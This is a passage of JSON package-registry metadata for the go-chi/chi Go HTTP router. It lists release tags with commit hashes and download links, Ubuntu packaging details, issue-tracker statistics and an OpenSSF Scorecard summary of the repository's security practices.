null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.207Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/golang-github-go-chi-chi?arch=source\u0026distro=ubuntu-23.04\u0026repository_url=https://launchpad.net/ubuntu/lunar","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/golang-github-go-chi-chi","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/golang-github-go-chi-chi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/golang-github-go-chi-chi/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/golang-github-go-chi-chi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/golang-github-go-chi-chi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/golang-github-go-chi-chi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/golang-github-go-chi-chi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/golang-github-go-chi-chi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/golang-github-go-chi-chi/codemeta","maintainers":[],"registry":{"name":"ubuntu-23.04","url":"https://launchpad.net/ubuntu/lunar","ecosystem":"ubuntu","default":false,"packages_count":36116,"maintainers_count":0,"namespaces_count":4,"keywords_count":1000,"github":"ubuntu","metadata":{"codename":"lunar","mirror":"http://old-releases.ubuntu.com/ubuntu","funded_packages_count":613},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:49.117Z","updated_at":"2026-08-10T05:07:59.632Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/namespaces"}},{"id":3877254,"name":"github.com/go-chi/chi/v5","ecosystem":"go","description":"Package chi is a small, idiomatic and composable router for building HTTP services.","homepage":"https://github.com/go-chi/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-chi/chi","keywords_array":[],"namespace":"github.com/go-chi/chi","versions_count":24,"first_release_published_at":"2021-02-28T00:11:55.000Z","latest_release_published_at":"2026-07-05T18:51:45.000Z","latest_release_number":"v5.3.1","last_synced_at":"2026-08-12T02:06:18.272Z","created_at":"2022-04-11T22:48:52.928Z","updated_at":"2026-08-12T02:06:18.272Z","registry_url":"https://pkg.go.dev/github.com/go-chi/chi/v5","install_command":"go get github.com/go-chi/chi/v5","documentation_url":"https://pkg.go.dev/github.com/go-chi/chi/v5#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.